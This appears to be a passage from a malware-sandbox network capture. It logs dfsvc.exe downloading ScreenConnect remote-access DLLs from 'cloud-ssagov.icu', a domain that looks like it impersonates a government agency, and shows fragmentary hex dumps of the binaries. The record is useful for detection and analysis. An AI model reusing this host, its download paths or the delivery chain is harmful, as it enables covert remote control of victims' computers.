06 02 04 6f 11 03 00 0a 28 2e 01 00 Data Ascii: &~bs%(K+}r{r,`{q,G{r(,+}xs(&{ro{r(,+{xo{r(,+}x0CF(-!{T%-&+(,{To, ("({Z(oo(.
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 06 9f 01 00 06 73 1a 04 00 0a 28 ac 00 00 2b 25 0a 28 98 01 00 06 06 a2 28 ad 00 00 2b 25 0b 7d 85 00 00 04 07 a2 2a 52 02 28 97 01 00 06 6f 1c 04 00 0a 2d 06 02 6f 9b 01 00 06 2a 32 02 28 97 01 00 06 6f 1c 04 00 0a 2a 52 03 02 25 fe 07 9a 01 00 06 73 83 01 00 0a 6f 1d 04 00 0a 2a 4e 03 02 fe 06 a0 01 00 06 73 83 01 00 0a 6f 1e 04 00 0a 2a 1e 02 6f 9b 01 00 06 2a 00 13 30 04 00 43 00 00 00 62 00 00 11 73 45 08 00 06 0a 06 03 7d 94 03 00 04 02 7b 88 00 00 04 2d 10 02 7e 1f 04 00 0a 73 20 04 00 0a 7d 88 00 00 04 02 7b 88 00 00 04 06 7b 94 03 00 04 06 fe 06 46 08 00 06 73 21 04 00 0a 28 ae 00 00 2b 2a 1e 02 28 46 00 00 0a 2a 62 02 28 22 04 00 0a 02 03 72 02 20 00 70 28 af 00 00 2b 7d 89 00 00 04 2a 13 30 04 00 70 00 00 00 63 00 00 11 73 47 08 00 06 0a 06 02 Data Ascii: s(+%((+%}R(o-o2(oR%soNsoo0CbsE}{-~s }{{Fs!(+(Fb("r p(+}*0pcsG
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 16 2a ba 02 03 28 5f 05 00 0a 02 17 28 bb 02 00 06 02 02 28 ac 02 00 06 2d 08 02 28 b8 02 00 06 2d 03 14 2b 06 02 6f 62 04 00 0a 6f c0 02 00 06 2a 5a 02 03 28 60 05 00 0a 02 16 28 bb 02 00 06 02 14 6f c0 02 00 06 2a 00 00 00 13 30 03 00 13 00 00 00 92 00 00 11 02 28 f8 00 00 2b 0a 06 2c 08 06 02 03 6f 61 05 00 0a 2a 00 13 30 02 00 6e 00 00 00 93 00 00 11 02 28 62 05 00 0a 2d 1d 02 28 b0 02 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 b0 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 ae 02 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 ae 02 00 06 2a 02 28 be 01 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 be 01 00 06 2a 02 6f c4 02 00 06 2a 7a 02 7b ef 00 00 04 2c 0f 02 28 a8 02 00 06 2c 07 02 28 a8 02 00 06 2a 02 28 Data Ascii: (_((-(-+oboZ(`(o0(+,oa0n(b-((c,({,((c,(((c,(oz{,(,(*(
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 04 00 0a a2 25 18 73 2a 04 00 0a 25 18 6f c9 02 00 0a 25 1f 2a 28 34 05 00 06 6f 02 06 00 0a 25 28 04 06 00 0a 6f 13 04 00 0a 0e 04 7e a4 04 00 04 25 2d 17 26 7e a3 04 00 04 fe 06 ed 09 00 06 73 05 06 00 0a 25 80 a4 04 00 04 28 49 01 00 2b 28 4a 01 00 2b a2 6f 40 04 00 0a 06 02 17 14 28 4b 01 00 2b 28 4c 01 00 2b 7d a6 04 00 04 02 06 7b a6 04 00 04 28 4d 01 00 2b 28 5d 04 00 0a 02 06 7b a6 04 00 04 28 4e 01 00 2b 28 5e 04 00 0a 06 06 fe 06 ef 09 00 06 73 83 01 00 0a 7d a7 04 00 04 06 7b a6 04 00 04 06 fe 06 f0 09 00 06 73 5c 04 00 0a 28 4f 01 00 2b 2a 32 02 7b 36 01 00 04 6f 62 04 00 0a 2a 36 02 7b 36 01 00 04 03 6f 00 02 00 0a 2a 1e 02 7b 37 01 00 04 2a 22 02 03 7d 37 01 00 04 2a 00 13 30 05 00 64 00 00 00 00 00 00 00 02 03 04 05 0e 04 28 79 03 00 06 02 Data Ascii: %s%o%(4o%(o~%-&~s%(I+(J+o@(K+(L+}{(M+(]{(N+(^s}{s\(O+2{6ob6{6o{7"}7*0d(y
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 04 05 00 04 fe 06 63 0a 00 06 73 aa 07 00 0a 25 80 0b 05 00 04 28 99 01 00 2b 2d 05 1a 13 04 de 18 de 14 07 2c 06 07 6f 22 00 00 0a dc 06 2c 06 06 6f 22 00 00 0a dc 17 2a 11 04 2a 00 00 00 41 34 00 00 02 00 00 00 6d 00 00 00 1f 01 00 00 8c 01 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 67 00 00 00 2f 01 00 00 96 01 00 00 0a 00 00 00 00 00 00 00 32 02 7b 01 05 00 04 6f ab 07 00 0a 2a 00 00 00 1b 30 05 00 e4 00 00 00 f1 00 00 11 73 89 0a 00 06 0a 06 02 7d 40 05 00 04 06 03 7d 3b 05 00 04 28 60 07 00 0a 28 ac 07 00 0a 73 59 0a 00 06 0b 06 07 6f 80 00 00 0a 73 5a 0a 00 06 7d 3c 05 00 04 06 06 7b 3b 05 00 04 6f ad 07 00 0a 0c 12 02 28 ae 07 00 0a 06 7b 3b 05 00 04 6f ad 07 00 0a 0c 12 02 28 af 07 00 0a 1f 20 17 28 b0 07 00 0a 7d 3d 05 00 04 06 06 7b 3b 05 00 04 Data Ascii: cs%(+-,o",o"*A4mg/2{o0s}@};(`(sYosZ}<{;o({;o( (}={;
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 80 01 02 00 04 20 8f 00 00 00 28 37 06 00 06 80 02 02 00 04 20 ff 00 00 00 28 37 06 00 06 80 03 02 00 04 16 28 37 06 00 06 80 04 02 00 04 20 96 00 00 00 28 37 06 00 06 80 06 02 00 04 1b 8d d3 02 00 01 25 d0 64 02 00 04 28 ba 04 00 0a 80 07 02 00 04 1f 11 8d d3 02 00 01 25 d0 65 02 00 04 28 ba 04 00 0a 80 08 02 00 04 22 00 00 80 3f 22 00 00 80 3f 22 00 00 80 3f 22 00 00 00 3f 28 38 05 00 06 80 09 02 00 04 22 33 33 33 3f 22 33 33 33 3f 22 33 33 33 3f 22 00 00 80 3f 28 38 05 00 06 80 0a 02 00 04 1e 28 34 05 00 06 80 0b 02 00 04 1a 28 34 05 00 06 73 ca 04 00 0a 80 0c 02 00 04 1f 18 1f 18 28 35 05 00 06 80 0d 02 00 04 1f 10 1f 10 28 35 05 00 06 80 0e 02 00 04 1f 18 1f 18 28 35 05 00 06 80 0f 02 00 04 1f 21 1f 10 28 35 05 00 06 80 10 02 00 04 1f 20 1f 10 28 35 Data Ascii: (7 (7(7 (7%d(%e("?"?"?"?(8"333?"333?"333?"?(8(4(4s(5(5(5!(5 (5
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 6f 98 09 00 0a 04 2c 07 06 04 6f 98 09 00 0a 25 28 01 02 00 0a 28 01 02 00 0a 28 77 01 00 0a 06 6f 99 09 00 0a 28 dc 04 00 0a 7d 18 06 00 04 fe 06 f1 0b 00 06 73 38 02 00 0a 14 28 39 02 00 0a 26 2a 00 13 30 05 00 89 00 00 00 3f 01 00 11 73 f6 0b 00 06 0a 06 0e 06 7d 1d 06 00 04 06 03 04 05 0e 04 73 79 03 00 06 7d 1e 06 00 04 02 28 9a 09 00 0a 0b 06 7b 1e 06 00 04 06 fe 06 f7 0b 00 06 73 9f 01 00 0a 6f a0 01 00 0a 0e 05 2c 1a 06 7b 1e 06 00 04 07 6f da 02 00 0a 26 06 7b 1e 06 00 04 6f d8 01 00 0a 2b 28 0e 07 2c 0d 0e 07 06 7b 1e 06 00 04 6f 9b 09 00 0a 06 7b 1e 06 00 04 07 6f 9c 09 00 0a 06 7b 1e 06 00 04 6f dc 02 00 0a 06 7b 1e 06 00 04 2a 62 03 04 05 0e 04 73 79 03 00 06 25 02 6f da 02 00 0a 26 6f 7c 03 00 06 2a 00 00 13 30 02 00 34 00 00 00 40 01 00 11 Data Ascii: o,o%(((wo(}s8(9&0?s}sy}({so,{o&{o+(,{o{o{o{bsy%o&o\|*04@
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 0d 0b 00 0a 2a 00 00 13 30 02 00 2f 00 00 00 87 01 00 11 02 03 28 08 0b 00 0a 0a 12 00 28 ea 02 00 0a 2c 0d 12 00 28 77 09 00 0a 73 e8 02 00 0a 2a 7e 49 01 00 04 03 6f 0e 0b 00 0a 28 0a 0b 00 0a 2a 36 03 02 28 0b 0b 00 0a 73 67 0c 00 06 2a 2e 73 fd 06 00 06 80 6b 02 00 04 2a 1e 02 28 46 00 00 0a 2a 1e 03 6f 0f 0b 00 0a 2a 2e 73 00 07 00 06 80 6d 02 00 04 2a 1e 02 28 46 00 00 0a 2a 42 03 28 c7 08 00 0a 2c 07 03 17 28 10 0b 00 0a 2a 66 03 28 c7 08 00 0a 2c 10 03 28 11 0b 00 0a 8e 2d 07 03 16 28 10 0b 00 0a 2a 2e 73 04 07 00 06 80 70 02 00 04 2a 1e 02 28 46 00 00 0a 2a 2a 03 7b f4 00 00 0a 14 fe 03 2a 1e 02 28 46 00 00 0a 2a 62 03 6f 12 0b 00 0a 02 7c 72 02 00 04 7b 13 0b 00 0a 59 28 14 0b 00 0a 2a 1e 02 28 46 00 00 0a 2a 13 30 02 00 57 00 00 00 00 00 00 00 Data Ascii: 0/((,(ws~Io(6(sg.sk(Fo.sm(FB(,(f(,(-(.sp(F*{(Fbo\|r{Y((F*0W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:57 UTC	93	OUT	GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:57 UTC	235	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 197120 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:56 GMT Connection: close
2024-11-13 17:26:57 UTC	16149	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e7 02 f1 94 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 96 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 23 92 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0 `#@
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 00 00 11 73 75 00 00 0a 0a 06 72 8f 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 Data Ascii: surpov&rYpov&(, ow&}ow&o)*.(&(^uw,w(0@surpov&rYpov&(, ow&}ow&o).(&(^ux,x(*
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 15 04 00 06 72 b7 17 00 70 18 28 2e 02 00 0a 26 02 28 da 00 00 0a 7d 05 01 00 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 Data Ascii: rp(.&(}~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 00 38 56 4a 1f 16 00 6a 38 4e 1f 16 00 76 38 4e 1f 36 00 56 0a 58 1f 16 00 e1 01 5d 1f 16 00 f6 03 6e 1f 16 00 30 07 7f 1f 16 00 ab 08 5d 1f 16 00 30 04 87 1f 16 00 4d 07 91 1f 16 00 01 00 9b 1f 16 00 3b 03 9b 1f 06 00 ce 72 a4 1f 06 00 69 5c b3 1d 06 00 ce 72 a4 1f 06 00 a5 75 a4 1d 01 00 e3 74 a9 1f 01 00 e5 59 bf 10 01 00 50 37 af 1f 36 00 56 0a b4 1f 16 00 8a 02 b9 1f 36 00 56 0a c5 1f 16 00 a0 00 b9 1f 36 00 56 0a fc 11 16 00 70 00 f2 11 16 00 94 03 68 12 06 00 12 81 64 07 06 00 06 63 ca 11 06 00 7b 6d 25 11 06 00 ce 72 cf 11 06 00 71 32 dc 11 06 00 9c 79 e1 11 06 00 90 83 bc 10 06 00 a9 62 42 13 06 00 ce 72 cf 11 06 00 19 0d 58 04 06 00 26 77 ca 1f 06 00 ce 72 cf 1f 06 00 ac 65 90 1e 06 00 7d 5d e1 11 36 00 56 0a d4 1f 16 00 6c 01 d9 1f 06 00 ce 72 Data Ascii: 8VJj8Nv8N6VX]n0]0M;ri\rutYP76V6V6Vphdc{m%rq2ybBrX&wre}]6Vlr
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 00 00 00 c6 05 dc 6e b8 21 e8 03 00 00 00 00 00 00 c6 05 11 0c b1 04 e8 03 74 b2 00 00 00 00 c4 01 1e 2a db 2b e8 03 94 b2 00 00 00 00 94 00 7b 3e e5 2b e9 03 00 00 00 00 00 00 c4 05 42 64 ef 2b ea 03 37 b3 00 00 00 00 81 00 bc 71 ef 2b eb 03 58 b3 00 00 00 00 c4 00 58 10 e7 21 ec 03 a8 b9 00 00 00 00 81 00 81 2a f6 2b ed 03 10 ba 00 00 00 00 91 00 00 0f 05 2c f0 03 a8 ba 00 00 00 00 81 00 6a 09 15 2c f4 03 c8 ba 00 00 00 00 91 18 97 66 c0 20 f5 03 d4 ba 00 00 00 00 86 18 91 66 01 00 f5 03 dc ba 00 00 00 00 83 00 87 01 1c 2c f5 03 fb ba 00 00 00 00 91 18 97 66 c0 20 f6 03 07 bb 00 00 00 00 86 18 91 66 01 00 f6 03 0f bb 00 00 00 00 83 00 3a 00 2d 2c f6 03 17 bb 00 00 00 00 83 00 74 03 34 2c f7 03 1f bb 00 00 00 00 83 00 a3 01 85 29 f8 03 32 bb 00 00 00 00 Data Ascii: n!t+{>+Bd+7q+XX!+,j,f f,f f:-,t4,)2
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 00 b6 1c 01 13 1a 00 e8 2e 01 13 6b 00 b6 1c 20 13 6b 00 b6 1c 21 13 6b 00 b6 1c 41 13 6b 00 b6 1c 60 13 6b 00 b6 1c 61 13 1a 00 e8 2e 61 13 6b 00 b6 1c 80 13 6b 00 b6 1c a3 13 6b 00 b6 1c c3 13 6b 00 b6 1c e1 13 6b 00 b6 1c e3 13 6b 00 b6 1c 01 14 6b 00 b6 1c 03 14 6b 00 b6 1c 21 14 6b 00 b6 1c 41 14 6b 00 b6 1c 60 14 6b 00 b6 1c 61 14 6b 00 b6 1c 63 14 6b 00 b6 1c 81 14 6b 00 b6 1c 83 14 6b 00 b6 1c a0 14 6b 00 b6 1c a1 14 6b 00 b6 1c c1 14 6b 00 b6 1c c3 14 6b 00 b6 1c e1 14 6b 00 b6 1c e3 14 6b 00 b6 1c 01 15 6b 00 b6 1c 03 15 6b 00 b6 1c 21 15 6b 00 b6 1c 23 15 6b 00 b6 1c 41 15 1a 00 69 2f 41 15 6b 00 b6 1c 44 15 c2 05 b6 1c 61 15 6b 00 b6 1c 63 15 6b 00 b6 1c 80 15 6b 00 b6 1c 81 15 6b 00 b6 1c 83 15 6b 00 b6 1c a0 15 6b 00 b6 1c a1 15 1a 00 e8 2e Data Ascii: .k k!kAk`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kAi/AkDakckkkkk.
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 74 69 6d 65 72 49 44 00 67 65 74 5f 52 65 71 75 65 73 74 49 44 00 73 65 74 5f 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 Data Ascii: timerIDget_RequestIDset_RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationData
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 50 72 6f 70 65 72 74 69 65 73 2e 53 74 61 74 75 73 47 6c 79 70 68 42 6c 61 6e 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 Data Ascii: Properties.StatusGlyphBlankMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnec
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 00 74 00 65 00 4d 00 69 00 63 00 72 00 6f 00 70 00 68 00 6f 00 6e 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 Data Ascii: teMicrophoneCommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolu
2024-11-13 17:26:57 UTC	16384	IN	Data Raw: 0a 01 00 02 00 00 00 00 01 00 00 6d 01 00 05 00 00 00 10 57 61 69 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 15 53 74 61 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 Data Ascii: mWaitMillisecondsStartMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMulti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:58 UTC	100	OUT	GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:59 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 68096 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:58 GMT Connection: close
2024-11-13 17:26:59 UTC	16150	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 75 1d df 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 70 0e 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnu" 0 @ p@
2024-11-13 17:26:59 UTC	16384	IN	Data Raw: bb 00 00 0a 25 09 6f 23 02 00 0a 6f bc 00 00 0a 6f 94 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a Data Ascii: %o#ooo-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,oe4g(V{To#o((J{Vo)(**
2024-11-13 17:26:59 UTC	16384	IN	Data Raw: 74 00 d1 07 2e 3e 16 15 31 04 c0 25 1c 15 79 05 16 3e 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 Data Ascii: t.>1%y>'--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi
2024-11-13 17:26:59 UTC	16384	IN	Data Raw: 6e 74 69 61 6c 73 41 63 74 69 6f 6e 00 53 65 63 75 72 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 Data Ascii: 